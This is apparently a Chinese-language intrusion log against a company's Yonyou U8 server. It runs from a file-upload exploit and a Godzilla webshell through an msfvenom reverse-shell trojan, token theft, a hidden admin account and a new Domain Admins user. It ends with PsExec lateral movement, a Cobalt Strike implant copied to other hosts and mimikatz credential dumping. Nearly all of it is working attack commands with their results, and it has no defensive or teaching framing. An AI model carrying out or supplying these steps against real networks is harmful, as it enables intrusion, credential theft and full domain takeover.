漏洞目标：http://x.x.x.x:8000/公司官网：http://xxx.com/涉及单位：XX有限责任公司单位地址：xxxxxxxxxxxxxxxxxxx

#项目地址https://github.com/xanszZZ/YY_upfile#安装pocsuite3pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple pocsuite3#进行漏洞检测pocsuite -r YY_upfile.py -f file.txt

http://X.X.X.X:8000/R9iPortal/debugg.jsp

#攻击命令pocsuite -r YY_upfile2.py -f file.txt

http://X.X.X.X:8000/R9iPortal/U8date.jsp    //哥斯拉默认连接

whoami                 #nt authority\systemhostname               #8888ipconfig /all          #域8888.com   内172.16.0.8  systeminfo             #Microsoft Windows Server 2008 R2 Enterprise   VMware, Inctasklist /svc          #无net time /domain       #8888.8888.com  //查询时间服务器  172.16.0.1netstat -an            #RDP:3389net user pts$ 123admiN /add            #成功net localgroup administrators pts$ /add #成功net user k 123admi /add /doamin        #失败net group "Domain Users" /domain         #无4k用户
net user pts$ 123admiN /add     #隐藏的系统账户net localgroup administrators pts$ /add

#Neo-regorg服务端地址http://X.X.X.X:8000/showstatus.jsp#通信隧道建立命令python3 neoreg.py -k 123123 -u http://X.X.X.X:8000/showstatus.jsp

#CS执行logonpasswords    //username:Administrator   password:[email protected]shell net group "Domain Computers" /domain    //255台主机 #哥斯拉中查询敏感信息C:/Users/Administrator.8888/   //文件修改日期2022年12月7日

进一步扫描获取更多的信息，但是动静会很大~暂且备用本地机器上存在域管理员的用户文件夹~可优先尝试窃取该用户的会话令牌

#哥斯拉操作payload windows/meterpreter/reverse_tcp   //反弹失败payload java/meterpreter/reverse_tcp      //反弹成功  无法获取会话令牌#生成木马文件msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=6666 -f exe -o Sysupdate.exe#MSFCONSOLEmsfconsole                                      //启动MSF的漏洞攻击框架use exploit/multi/handler                       //调用木马监听模块set payload windows/meterpreter/reverse_tcp     //设置木马服务端类型set lhost 10.0.20.3                             //设置监听的地址set lport 6666                                  //设置监听的端口run                                             //启动当前的监听

#Meterpreter操作use incognito      //进入incognito模块list_tokens -u    //列出令牌impersonate_token "WUHANKQ\Administrator"    //选择要窃取的账号#验证权限shell          chcp 65001      //活动代码页字符为UTF-8编码whoami    

#Meterpreter操作add_user username password -h 域控IPadd_group_user "Domain Admins" username -h 域控IPadd_user k 123admiN -h 172.16.X.Xadd_group_user "Domain Admins" k -h 172.16.X.X#目标CMD下操作chcp 65001net user k 123admiN /add /domainnet group "Domain Admins" k /add /domainnet group "Domain Admins" /domainnet group "Administrators" k /add /domain     #失败

username:8888\kpassword:123adm

#解决命令sfc /scannow    //无果#横向移动命令net use \\172.16.X.X /u:8888\k 123adm   //建立IPC$连接net use                    //查看已经建立的IPC$连接PsExec64.exe \\172.16.X.X -s cmd.exe -accepteula   //反弹cmddir \\172.16.0.20\c$                                 //查看默认的C盘共享copy SystemUpdate.exe \\172.16.X.X\c$               //拷贝本地CS马执行上线

#AV查询shell tasklist /svcavp.exe-> Kasperskyavp.exe-> Kaspersky#明文抓取privilege::debugsekurlsa::logonpasswords